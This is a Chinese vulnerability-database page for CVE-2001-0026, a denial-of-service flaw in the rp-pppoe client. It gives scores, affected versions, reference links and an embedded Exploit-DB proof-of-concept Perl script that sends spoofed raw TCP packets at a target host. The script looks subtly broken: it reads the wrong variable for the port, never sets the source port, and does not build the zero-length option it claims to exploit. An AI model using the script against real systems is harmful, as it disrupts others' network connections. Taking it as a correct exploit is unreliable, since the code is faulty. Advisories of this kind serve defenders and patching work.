CVE-2001-0026
CVSS5.0
发布时间 :2001-02-12 00:00:00
修订时间 :2008-09-05 16:23:05
NMCOE    

[原文]rp-pppoe PPPoE client allows remote attackers to cause a denial of service via the Clamp MSS option and a TCP packet with a zero-length TCP option.


[CNNVD]rp-pppoe PPPoE客户端漏洞(CNNVD-200102-065)

        rp-pppoe PPPoE客户端存在漏洞。远程攻击者借助Clamp MSS选项和带零长度TCP选项的TCP数据包导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:roaring_penguin:pppoe:2.1
cpe:/a:roaring_penguin:pppoe:2.4
cpe:/a:roaring_penguin:pppoe:2.2
cpe:/a:roaring_penguin:pppoe:2.3
cpe:/a:roaring_penguin:pppoe:2.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0026
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0026
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200102-065
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2098
(VENDOR_ADVISORY)  BID  2098
http://www.redhat.com/support/errata/RHSA-2000-130.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2000:130
http://archives.neohapsis.com/archives/bugtraq/2000-12/0134.html
(VENDOR_ADVISORY)  BUGTRAQ  20001211 DoS vulnerability in rp-pppoe versions <= 2.4
http://xforce.iss.net/static/5727.php
(VENDOR_ADVISORY)  XF  rppppoe-zero-length-dos
http://www.linux-mandrake.com/en/security/MDKSA-2000-084.php3
(UNKNOWN)  MANDRAKE  MDKSA-2000:084
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000357
(UNKNOWN)  CONECTIVA  CLA-2000:357

- 漏洞信息

rp-pppoe PPPoE客户端漏洞
中危 未知
2001-02-12 00:00:00 2005-05-02 00:00:00
远程  
        rp-pppoe PPPoE客户端存在漏洞。远程攻击者借助Clamp MSS选项和带零长度TCP选项的TCP数据包导致服务拒绝。

- 公告与补丁

        

- 漏洞信息 (20494)

RedHat Linux 7.0 Roaring Penguin PPPoE Denial of Service Vulnerability (EDBID:20494)
linux remote
2000-12-11 Verified
0 dethy
N/A [点击下载]
source: http://www.securityfocus.com/bid/2098/info

Roaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD.

PPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE recieves a malformed TCP packet with a "zero-length option", PPPoE will go into an infinite loop. As a result, the ppp connection being supported by PPPoE will time out and be terminated. A manual re-start is needed to regain functionality.

This bug has been fixed by Roaring Penguin Software in a new version, see the solutions section. 

#!/usr/bin/perl
# POC script that causes a DoS in an PPP-over-Ethernet Link, in RedHat 7.0.
# Advisory: http://www.redhat.com/support/errata/RHSA-2000-130.html
# by dethy
use Net::RawIP;
use Getopt::Std;
getopts('d:s:p:c',\%args) || &usage;
if(defined($args{d})){$daddr=$args{d};}else{&usage;}
if(defined($args{s})){$src=$args{s};}else{$src=&randsrc;}
if(defined($port{p})){$port=$args{p};}else{&usage;}
if(defined($args{c})){$count=$args{c};}else{$count=10;}

sub randport(){
 srand;
 return $sport=(int rand 65510); 
 }

sub randsrc(){
  srand; 
  return $saddr=(int rand 255).".".(int rand 255).".".(int rand 255).".".(int rand 255); 
 }

 $packet = new Net::RawIP({ip=>{},tcp=>{}});
 $packet->set({ ip => { saddr => $src, 
			daddr => $daddr, 
			tos => 3 },
               tcp => { source => $sport, 
			dest => $port,
                        syn => 1, psh => 1 } });

 $packet->send(0,$count);

sub usage(){ die("pppoe-link POC DoS on RH7\n$0 -d <dest> -s <source> -p <port> -c <count>\n"); }

		

- 漏洞信息

1688
Roaring Penguin PPPoE Zero-length Option Handling Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2000-12-11 Unknow
2000-12-11 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站